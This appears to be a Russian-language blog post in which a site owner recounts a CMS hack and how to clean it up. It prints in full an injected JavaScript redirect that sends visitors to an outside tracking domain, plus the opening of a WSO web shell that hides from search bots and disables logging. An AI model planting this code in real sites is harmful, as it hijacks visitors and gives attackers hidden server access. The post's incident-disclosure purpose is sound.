Сайт может угрожать безопасности вашего компьютера как убрать
Совсем недавно я обнаружил, что мои сайтики выпадают из индекса поисковых систем. Причиной всему стало переписывание файла htaccess и перенаправление мобильного трафика на рекламируемые третьей стороной сайты. Однако, мне удалось найти залитый shell и как бы обезвредить сайты. Детальнее ты можешь прочитать в статье переписали htaccess.
Итог моей компании защиты стали некоторые действия. В том числе выставление прав на все файлы htaccess chmod - 000, которые при всем моем скромном осведомлении можно изменить ТОЛЬКО через панель управления хостингом. Но беда не заставила себя долго ждать...
После некоторого времени затишья парниша из Уфы решил опять пошутить и срубить свое бабло, за что ему большая благодарность. Объясню. Если бы на его (или если ты читаешь эту статью то твоем месте) месте оказался более хитрожолтый человек, то навредил бы сильнее. Легкий спамчик и все, что он оставил после себя.
Вот код, который был добавлен в файл index.php:
<script language="javascript" type="text/javascript"> td6130score=0; rref6130=document.referrer; rref6130=unescape(rref6130); function event6130()
{ document.onmousemove=td6130; document.onmouseup=td6130; document.onclick=td6130; document.onmouseover=event61302; if(navigator.appName == "Microsoft Internet
Explorer") { self.onunload=function() { td6130(); } } } function event61302() { document.onmousedown=event6130; document.onmousemove=td6130; }
document.onmouseover=event61302; document.onmousedown=event6130; rref6130=document.referrer; event6130(); window.onload=event6130(); function td6130()
{ td6130score=td6130score+1; if(td6130score>10) { Traf6130 = GetCookie6130('t2135336130'); if (Traf6130 == null) { go6130(); } } } function go6130() { day = new Date(); u294 =
"http://" + Math.floor((Math.random()*100000)+1) + ".gotostat.ru/go.php?id=213533&rref=" + rref6130; pathname = "/"; myDomain = "/"; var largeExpDate = new Date ();
largeExpDate.setTime(largeExpDate.getTime() + (8 * 60 * 60 * 1000)); var largeExpDate2 = new Date (); largeExpDate2.setTime(largeExpDate2.getTime() + (24 * 60 * 60 * 1000));
SetCookie6130('t2135336130','1',largeExpDate, "/"); location.href = u294; } function GetCookie6130Val (offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr ==
-1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie6130 (name) { var arg = name + "="; var alen = arg.length;
var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return GetCookie6130Val (j); i =
document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie6130 (name, value) { var argv = SetCookie6130.arguments; var argc =
SetCookie6130.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv
[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : ""); } </script>
То есть, если ты также попался, как и я и заходя на любую страницу твоего сайта тебя перенаправляет на всякие ГС, то смотри файл:
templates/ШАБЛОН/index.php
Также можешь внимательно следить за подсетью: 46.191.225.XXX, так как этот взломщик именно оттуда.
Затем возьми filezilla и установи последнюю версию Eset Nod 32, скопируй свой сайт на компьютер и приблизительно в папке images или templates ты можешь обнаружить чудо-файл, который начинается так:
<?php
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
Почему я навредил сам себе? Из-за того, что давал доступ туда, куда не следует. Если ты демонстрируешь компоненты или расширения для любой CMS, то закрывай от общего доступа те места, где есть менеджер файлов.
